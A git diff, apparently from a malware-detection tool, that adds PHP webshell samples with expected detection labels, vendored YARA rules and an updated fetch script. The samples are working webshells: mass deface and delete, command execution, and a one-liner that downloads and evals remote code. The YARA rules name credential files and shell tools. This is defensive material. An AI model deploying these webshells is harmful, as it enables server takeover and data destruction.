"; + file_put_contents($location, $file); + if($type === "-alldir") { + massdeface($path, $file, $filename, "-alldir"); + } + } + } + } +} + +function massdelete($dir, $filename) { + $scandir = scandir($dir); + foreach($scandir as $dir_) { + $path = "$dir/$dir_"; + $location = "$path/$filename"; + if($dir_ === '.') { + if(file_exists("$dir/$filename")) { + unlink("$dir/$filename"); + } + } + elseif($dir_ === '..') { + if(file_exists(dirname($dir)."/$filename")) { + unlink(dirname($dir)."/$filename"); + } + } + else { + if(is_dir($path) AND is_writable($path)) { + if(file_exists($location)) { + print "[".color(1, 2, "DELETED")."] ".color(1, 4, $location)."
"; + unlink($location); + massdelete($path, $filename); + } + } + } + } +} + +if (isset($_GET['fileloc'])) { + echo "Current File : ".$_GET['fileloc']; + echo '
'; + echo "
".htmlspecialchars(file_get_contents($_GET['fileloc']))."
"; + author(); +} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "hapus") { + if (is_dir($_POST['path'])) { + xrmdir($_POST['path']); + if (file_exists($_POST['path'])) { + red("Failed to delete Directory !"); + } else { + green("Delete Directory Success !"); + echo "string"; + } + } elseif (is_file($_POST['path'])) { + @unlink($_POST['path']); + if (file_exists($_POST['path'])) { + red("Failed to Delete File !"); + } else { + green("Delete File Success !"); + } + } + elseif($_GET['do'] === "mass") { + if($_POST['start']) { + if($_POST['mass_type'] === 'singledir') { + print "
"; + massdeface($_POST['d_dir'], $_POST['script'], $_POST['d_file']); + print "
"; + } + elseif($_POST['mass_type'] === 'alldir') { + print "
"; + massdeface($_POST['d_dir'], $_POST['script'], $_POST['d_file'], "-alldir"); + print "
"; + } + elseif($_POST['mass_type'] === "delete") { + print "
"; + massdelete($_POST['d_dir'], $_POST['d_file']); + print "
"; + } + } + else { + print "
+ Tipe Sabun:
+ Mass Deface Single DirectoryMass Deface All DirectoryMass Delete File
+ ( kosongkan 'Index File' jika memilih Mass Delete File )

+ Folder:
+

+ Filename:
+

+ Index File:
+
+ +
"; + } + } +} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "ubahmod") { + echo "
".$_POST['path']."
"; + echo '
+ Permission : + + + +
'; + if (isset($_POST['chm0d'])) { + $cm = @chmod($_POST['path'], $_POST['perm']); + if ($cm == true) { + green("Change Mod Success !"); + } else { + red("Change Mod Failed !"); + } + } +} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "gantinama") { + if (isset($_POST['gantin'])) { + $ren = @rename($_POST['path'], $_POST['newname']); + if ($ren == true) { + green("Change Name Success !"); + } else { + red("Change Name Failed !"); + } + } + if (empty($_POST['name'])) { + $namaawal = $_POST['newname']; + } else { + $namawal = $_POST['name']; + } + echo "
".$_POST['path']."
"; + echo '
+ New Name : + + + +
'; +} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") { + if (isset($_POST['gasedit'])) { + $edit = @file_put_contents($_POST['path'], $_POST['src']); + if ($edit == true) { + green("Edit File Success !"); + } else { + red("Edit File Failed !"); + } + } + echo "
".$_POST['path']."

"; + echo '
+
+ + + +

'; +} + +echo '
+ + + + + +'; + +foreach($lokasinya as $dir){ + if(!is_dir($lokasi."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +echo ''; +foreach($lokasinya as $file) { + if(!is_file("$lokasi/$file")) continue; + $size = filesize("$lokasi/$file")/1024; + $size = round($size,3); + if($size >= 1024){ + $size = round($size/1024,2).' MB'; +} else { + $size = $size.' KB'; +} + +echo " + + + +"; +} + +echo '
Name
Size
Permissions
Options
".$dir."
--
"; + if(is_writable($lokasi."/".$dir)) echo ''; + elseif(!is_readable($lokasi."/".$dir)) echo ''; + echo statusnya($lokasi."/".$dir); + if(is_writable($lokasi."/".$dir) || !is_readable($lokasi."/".$dir)) echo ''; + + echo "
+ + + + + \" /> +
$file
".$size."
"; +if(is_writable("$lokasi/$file")) echo ''; +elseif(!is_readable("$lokasi/$file")) echo ''; +echo statusnya("$lokasi/$file"); +if(is_writable("$lokasi/$file") || !is_readable("$lokasi/$file")) echo ''; +echo "
+
+ + + + +\" /> +
';
+author();
+?>
diff --git a/samples/PHP/2024.sagsooz/2024.php.simple b/samples/PHP/2024.sagsooz/2024.php.simple
new file mode 100644
index 00000000..649568ef
--- /dev/null
+++ b/samples/PHP/2024.sagsooz/2024.php.simple
@@ -0,0 +1,22 @@
+# PHP/2024.sagsooz/2024.php
+3P/InQuest-VT/base64/url
+3P/php-malware/dangerousphp
+3P/php-malware/dodgyphp
+3P/php-malware/dodgystrings
+3P/signature_base/webshell/php
+combo/backdoor/php
+data/embedded/base64/url
+data/embedded/html
+encoding/base64
+evasion/base64/decode
+evasion/php_no_time_limit
+exec/shell_command
+fs/directory/remove
+fs/file/delete
+fs/permission/modify
+net/http/form/upload
+net/http/post
+net/upload
+net/url/encode
+ref/site/url
+ref/words/password
diff --git a/samples/PHP/2024.sagsooz/bestmini.php b/samples/PHP/2024.sagsooz/bestmini.php
new file mode 100644
index 00000000..ff754389
--- /dev/null
+++ b/samples/PHP/2024.sagsooz/bestmini.php
@@ -0,0 +1 @@
+".file_get_contents("https://raw.githubusercontent.com/sagsooz/Bypass-Webshell/main/2024.php"));?>
diff --git a/samples/PHP/2024.sagsooz/bestmini.php.simple b/samples/PHP/2024.sagsooz/bestmini.php.simple
new file mode 100644
index 00000000..e7c61ba1
--- /dev/null
+++ b/samples/PHP/2024.sagsooz/bestmini.php.simple
@@ -0,0 +1,6 @@
+# PHP/2024.sagsooz/bestmini.php
+3P/php-malware/obfuscatedphp
+3P/signature_base/webshell/php
+ref/site/php
+ref/site/url
+techniques/code_eval
diff --git a/samples/PHP/2024.tobiasGuta/webshell.php b/samples/PHP/2024.tobiasGuta/webshell.php
new file mode 100644
index 00000000..94d9889e
--- /dev/null
+++ b/samples/PHP/2024.tobiasGuta/webshell.php
@@ -0,0 +1,53 @@
+ + + + + + Webshell + + + +
+ $ {$cmd}:\n\n$output\n"; + echo $formatted_output; + } + ?> +
+
+
+ +
+
+
+
+
diff --git a/third_party/yara/php-malware/LICENSE b/third_party/yara/php-malware/LICENSE
new file mode 100644
index 00000000..65c5ca88
--- /dev/null
+++ b/third_party/yara/php-malware/LICENSE
@@ -0,0 +1,165 @@ + GNU LESSER GENERAL PUBLIC LICENSE + Version 3, 29 June 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + + This version of the GNU Lesser General Public License incorporates +the terms and conditions of version 3 of the GNU General Public +License, supplemented by the additional permissions listed below. + + 0. Additional Definitions. + + As used herein, "this License" refers to version 3 of the GNU Lesser +General Public License, and the "GNU GPL" refers to version 3 of the GNU +General Public License. + + "The Library" refers to a covered work governed by this License, +other than an Application or a Combined Work as defined below. + + An "Application" is any work that makes use of an interface provided +by the Library, but which is not otherwise based on the Library. +Defining a subclass of a class defined by the Library is deemed a mode +of using an interface provided by the Library. + + A "Combined Work" is a work produced by combining or linking an +Application with the Library. The particular version of the Library +with which the Combined Work was made is also called the "Linked +Version". + + The "Minimal Corresponding Source" for a Combined Work means the +Corresponding Source for the Combined Work, excluding any source code +for portions of the Combined Work that, considered in isolation, are +based on the Application, and not on the Linked Version. + + The "Corresponding Application Code" for a Combined Work means the +object code and/or source code for the Application, including any data +and utility programs needed for reproducing the Combined Work from the +Application, but excluding the System Libraries of the Combined Work. + + 1. Exception to Section 3 of the GNU GPL. + + You may convey a covered work under sections 3 and 4 of this License +without being bound by section 3 of the GNU GPL. 
+ + 2. Conveying Modified Versions. + + If you modify a copy of the Library, and, in your modifications, a +facility refers to a function or data to be supplied by an Application +that uses the facility (other than as an argument passed when the +facility is invoked), then you may convey a copy of the modified +version: + + a) under this License, provided that you make a good faith effort to + ensure that, in the event an Application does not supply the + function or data, the facility still operates, and performs + whatever part of its purpose remains meaningful, or + + b) under the GNU GPL, with none of the additional permissions of + this License applicable to that copy. + + 3. Object Code Incorporating Material from Library Header Files. + + The object code form of an Application may incorporate material from +a header file that is part of the Library. You may convey such object +code under terms of your choice, provided that, if the incorporated +material is not limited to numerical parameters, data structure +layouts and accessors, or small macros, inline functions and templates +(ten or fewer lines in length), you do both of the following: + + a) Give prominent notice with each copy of the object code that the + Library is used in it and that the Library and its use are + covered by this License. + + b) Accompany the object code with a copy of the GNU GPL and this license + document. + + 4. Combined Works. + + You may convey a Combined Work under terms of your choice that, +taken together, effectively do not restrict modification of the +portions of the Library contained in the Combined Work and reverse +engineering for debugging such modifications, if you also do each of +the following: + + a) Give prominent notice with each copy of the Combined Work that + the Library is used in it and that the Library and its use are + covered by this License. + + b) Accompany the Combined Work with a copy of the GNU GPL and this license + document. 
+ + c) For a Combined Work that displays copyright notices during + execution, include the copyright notice for the Library among + these notices, as well as a reference directing the user to the + copies of the GNU GPL and this license document. + + d) Do one of the following: + + 0) Convey the Minimal Corresponding Source under the terms of this + License, and the Corresponding Application Code in a form + suitable for, and under terms that permit, the user to + recombine or relink the Application with a modified version of + the Linked Version to produce a modified Combined Work, in the + manner specified by section 6 of the GNU GPL for conveying + Corresponding Source. + + 1) Use a suitable shared library mechanism for linking with the + Library. A suitable mechanism is one that (a) uses at run time + a copy of the Library already present on the user's computer + system, and (b) will operate properly with a modified version + of the Library that is interface-compatible with the Linked + Version. + + e) Provide Installation Information, but only if you would otherwise + be required to provide such information under section 6 of the + GNU GPL, and only to the extent that such information is + necessary to install and execute a modified version of the + Combined Work produced by recombining or relinking the + Application with a modified version of the Linked Version. (If + you use option 4d0, the Installation Information must accompany + the Minimal Corresponding Source and Corresponding Application + Code. If you use option 4d1, you must provide the Installation + Information in the manner specified by section 6 of the GNU GPL + for conveying Corresponding Source.) + + 5. Combined Libraries. 
+ + You may place library facilities that are a work based on the +Library side by side in a single library together with other library +facilities that are not Applications and are not covered by this +License, and convey such a combined library under terms of your +choice, if you do both of the following: + + a) Accompany the combined library with a copy of the same work based + on the Library, uncombined with any other library facilities, + conveyed under the terms of this License. + + b) Give prominent notice with the combined library that part of it + is a work based on the Library, and explaining where to find the + accompanying uncombined form of the same work. + + 6. Revised Versions of the GNU Lesser General Public License. + + The Free Software Foundation may publish revised and/or new versions +of the GNU Lesser General Public License from time to time. Such new +versions will be similar in spirit to the present version, but may +differ in detail to address new problems or concerns. + + Each version is given a distinguishing version number. If the +Library as you received it specifies that a certain numbered version +of the GNU Lesser General Public License "or any later version" +applies to it, you have the option of following the terms and +conditions either of that published version or of any later version +published by the Free Software Foundation. If the Library as you +received it does not specify a version number of the GNU Lesser +General Public License, you may choose any version of the GNU Lesser +General Public License ever published by the Free Software Foundation. + + If the Library as you received it specifies that a proxy can decide +whether future versions of the GNU Lesser General Public License shall +apply, that proxy's public statement of acceptance of any version is +permanent authorization for you to choose that version for the +Library. 
diff --git a/third_party/yara/php-malware/RELEASE b/third_party/yara/php-malware/RELEASE
new file mode 100644
index 00000000..20dce2f9
--- /dev/null
+++ b/third_party/yara/php-malware/RELEASE
@@ -0,0 +1 @@
+87b6d7faa4829b1e1c7c8895ef33d2b84d00b11f
diff --git a/third_party/yara/php-malware/php.yar b/third_party/yara/php-malware/php.yar
new file mode 100644
index 00000000..b9917db9
--- /dev/null
+++ b/third_party/yara/php-malware/php.yar
@@ -0,0 +1,382 @@ +/* bincapz HACK: whitelist non-PHP programs */ +private rule IsWhitelisted { + strings: + $php = " 250)) and not IsWhitelisted +} + +rule HiddenInAFile +{ + strings: + $gif = {47 49 46 38 ?? 61} // GIF8[version]a + $png = {89 50 4E 47 0D 0a 1a 0a} // \X89png\X0D\X0A\X1A\X0A + $jpeg = {FF D8 FF E0 ?? ?? 4A 46 49 46 } // https://raw.githubusercontent.com/corkami/pics/master/JPG.png + + condition: + ($gif at 0 or $png at 0 or $jpeg at 0) and (PasswordProtection or ObfuscatedPhp or DodgyPhp or DangerousPhp) and not IsWhitelisted +} + +rule CloudFlareBypass +{ + strings: + $ = "chk_jschl" + $ = "jschl_vc" + $ = "jschl_answer" + + condition: + 2 of them // Better be safe than sorry +} + +private rule IRC +{ + strings: + $ = "USER" fullword nocase + $ = "PASS" fullword nocase + $ = "PRIVMSG" fullword nocase + $ = "MODE" fullword nocase + $ = "PING" fullword nocase + $ = "PONG" fullword nocase + $ = "JOIN" fullword nocase + $ = "PART" fullword nocase + + condition: + 5 of them +} + +private rule b64 +{ + strings: + $user_agent = "SFRUUF9VU0VSX0FHRU5UCg" + $eval = "ZXZhbCg" + $system = "c3lzdGVt" + $preg_replace = "cHJlZ19yZXBsYWNl" + $exec = "ZXhlYyg" + $base64_decode = "YmFzZTY0X2RlY29kZ" + $perl_shebang = "IyEvdXNyL2Jpbi9wZXJsCg" + $cmd_exe = "Y21kLmV4ZQ" + $powershell = "cG93ZXJzaGVsbC5leGU" + + condition: + any of them +} + +private rule hex +{ + strings: + $globals = "\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53" nocase + $eval = "\\x65\\x76\\x61\\x6C\\x28" nocase + $exec = "\\x65\\x78\\x65\\x63" nocase + $system = "\\x73\\x79\\x73\\x74\\x65\\x6d" nocase + $preg_replace = "\\x70\\x72\\x65\\x67\\x5f\\x72\\x65\\x70\\x6c\\x61\\x63\\x65" nocase + $http_user_agent = "\\x48\\124\\x54\\120\\x5f\\125\\x53\\105\\x52\\137\\x41\\107\\x45\\116\\x54" nocase + $base64_decode = "\\x61\\x73\\x65\\x36\\x34\\x5f\\x64\\x65\\x63\\x6f\\x64\\x65\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6c\\x61\\x74\\x65\\x28" nocase + + condition: + any of them +} + +private rule Hpack +{ + strings: + 
$globals = "474c4f42414c53" nocase + $eval = "6576616C28" nocase + $exec = "65786563" nocase + $system = "73797374656d" nocase + $preg_replace = "707265675f7265706c616365" nocase + $base64_decode = "61736536345f6465636f646528677a696e666c61746528" nocase + + condition: + any of them +} + +private rule strrev +{ + strings: + $globals = "slabolg" nocase fullword + $preg_replace = "ecalper_gerp" nocase fullword + $base64_decode = "edoced_46esab" nocase fullword + $gzinflate = "etalfnizg" nocase fullword + + condition: + any of them +} + + +rule SuspiciousEncoding +{ + condition: + (b64 or hex or strrev or Hpack) and not IsWhitelisted +} + +rule DodgyStrings +{ + strings: + $ = ".bash_history" + $ = /AddType\s+application\/x-httpd-(php|cgi)/ nocase + $ = /php_value\s*auto_prepend_file/ nocase + $ = /SecFilterEngine\s+Off/ nocase // disable modsec + $ = /Add(Handler|Type|OutputFilter)\s+[^\s]+\s+\.htaccess/ nocase + $ = ".mysql_history" + $ = ".ssh/authorized_keys" + $ = "/(.*)/e" // preg_replace code execution + $ = "/../../../" + $ = "/etc/passwd" + $ = "/etc/proftpd.conf" + $ = "/etc/resolv.conf" + $ = "/etc/shadow" + $ = "/etc/syslog.conf" + $ = "/proc/cpuinfo" fullword + $ = "/var/log/lastlog" + $ = "/windows/system32/" + $ = "LOAD DATA LOCAL INFILE" nocase + $ = "WScript.Shell" + $ = "WinExec" + $ = "b374k" fullword nocase + $ = "backdoor" fullword nocase + $ = /(c99|r57|fx29)shell/ + $ = "cmd.exe" fullword nocase + $ = "powershell.exe" fullword nocase + $ = /defac(ed|er|ement|ing)/ fullword nocase + $ = "evilc0ders" fullword nocase + $ = "exploit" fullword nocase + $ = "find . 
-type f" fullword + $ = "hashcrack" nocase + $ = "id_rsa" fullword + $ = "ipconfig" fullword nocase + $ = "kernel32.dll" fullword nocase + $ = "kingdefacer" nocase + $ = "Wireghoul" nocase fullword + $ = "LD_PRELOAD" fullword + $ = "libpcprofile" // CVE-2010-3856 local root + $ = "locus7s" nocase + $ = "ls -la" fullword + $ = "meterpreter" fullword + $ = "nc -l" fullword + $ = "netstat -an" fullword + $ = "php://" + $ = "ps -aux" fullword + $ = "rootkit" fullword nocase + $ = "slowloris" fullword nocase + $ = "suhosin" fullword + $ = "sun-tzu" fullword nocase // Because quotes from the Art of War is mandatory for any cool webshell. + $ = /trojan (payload)?/ + $ = "uname -a" fullword + $ = "visbot" nocase fullword + $ = "warez" fullword nocase + $ = "whoami" fullword + $ = /(r[e3]v[e3]rs[e3]|w[3e]b|cmd)\s*sh[e3]ll/ nocase + $ = /-perm -0[24]000/ // find setuid files + $ = /\/bin\/(ba)?sh/ fullword + $ = /hack(ing|er|ed)/ nocase + $ = /(safe_mode|open_basedir) bypass/ nocase + $ = /xp_(execresultset|regenumkeys|cmdshell|filelist)/ + + $vbs = /language\s*=\s*vbscript/ nocase + $asp = "scripting.filesystemobject" nocase + + condition: + (IRC or 2 of them) and not IsWhitelisted +} + +rule Websites +{ + strings: + $ = "1337day.com" nocase + $ = "antichat.ru" nocase + $ = "b374k" nocase + $ = "ccteam.ru" nocase + $ = "crackfor" nocase + $ = "darkc0de" nocase + $ = "egyspider.eu" nocase + $ = "exploit-db.com" nocase + $ = "fopo.com.ar" nocase /* Free Online Php Obfuscator */ + $ = "hashchecker.com" nocase + $ = "hashkiller.com" nocase + $ = "md5crack.com" nocase + $ = "md5decrypter.com" nocase + $ = "milw0rm.com" nocase + $ = "milw00rm.com" nocase + $ = "packetstormsecurity" nocase + $ = "pentestmonkey.net" nocase + $ = "phpjiami.com" nocase + $ = "rapid7.com" nocase + $ = "securityfocus" nocase + $ = "shodan.io" nocase + $ = "github.com/b374k/b374k" nocase + $ = "mumaasp.com" nocase + + condition: + (any of them) and not IsWhitelisted +} + 
diff --git a/third_party/yara/update.sh b/third_party/yara/update.sh
index 19ccfd6b..5818707b 100755
--- a/third_party/yara/update.sh
+++ b/third_party/yara/update.sh
@@ -33,6 +33,8 @@ function update_dep() {
 local tmpdir=$(mktemp -d)
 local rel="unknown"
+ mkdir -p "${kind}" || true
+
 case $kind in
 YARAForge)
 rel=$(latest_github_release YARAHQ/yara-forge)
@@ -46,6 +48,23 @@ function update_dep() {
 popd || exit 1
 find "${tmpdir}" \( -name "*.yar*" -o -name "*LICENSE*" \) -print -exec cp {} "${kind}" \;
 ;;
+ php-malware)
+ git clone https://github.com/jvoisin/php-malware-finder.git "${tmpdir}"
+ pushd "${tmpdir}" || exit 1
+ rel="$(git rev-parse HEAD)"
+ popd || exit 1
+ cp "${tmpdir}/LICENSE" "${kind}"
+ echo '/* bincapz HACK: whitelist non-PHP programs */
+private rule IsWhitelisted {
+ strings:
+ $php = " "${tmpdir}/whitelist.yar"
+
+ grep -hv 'include "whitelist.yar"' "${tmpdir}/whitelist.yar" "${tmpdir}/data/php.yar" > "${kind}/php.yar"
+ ;;
 threat_hunting)
 rel=$(latest_github_release mthcht/ThreatHunting-Keywords-yara-rules)
 curl -L -o "${tmpdir}/keywords.zip" "https://github.com/mthcht/ThreatHunting-Keywords-yara-rules/archive/refs/tags/${rel}.zip"
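Review bot: The new `mkdir -p "${kind}" || true` silently discards a failure to create the destination directory, so the `cp` and `find -exec cp` calls later in update_dep then write into a path that does not exist and the real cause is hidden. The function already aborts on pushd/popd failures with `|| exit 1`, so the consistent form is `mkdir -p "${kind}" || exit 1`. update_dep's body continues outside the hunk.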
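Review bot: The `git clone` of php-malware-finder in the new `php-malware)` case is neither pinned nor checked: it fetches whatever the default branch HEAD is at run time, and if the clone fails the following `pushd "${tmpdir}"` still succeeds because mktemp already created that directory, so `rel` and the generated rule file are then derived from an empty tree (whether `set -e` is in effect is not visible in this hunk). The other cases in this function resolve a release via `latest_github_release` before downloading, so their recorded `rel` describes what will be fetched; here it is only read back afterwards, which makes the vendored rule set non-reproducible between two runs of the script. At minimum fail fast with `git clone https://github.com/jvoisin/php-malware-finder.git "${tmpdir}" || exit 1` and `cp "${tmpdir}/LICENSE" "${kind}" || exit 1`, and consider checking out a pinned commit (`git -C "${tmpdir}" checkout "<PINNED_COMMIT>"`, placeholder) so RELEASE records an intended version rather than an observed one. The `grep -hv` that drops the `include "whitelist.yar"` line also assumes upstream's data/php.yar carries no other include directives; a one-line comment stating that assumption would help the next updater. update_dep's body continues outside the hunk.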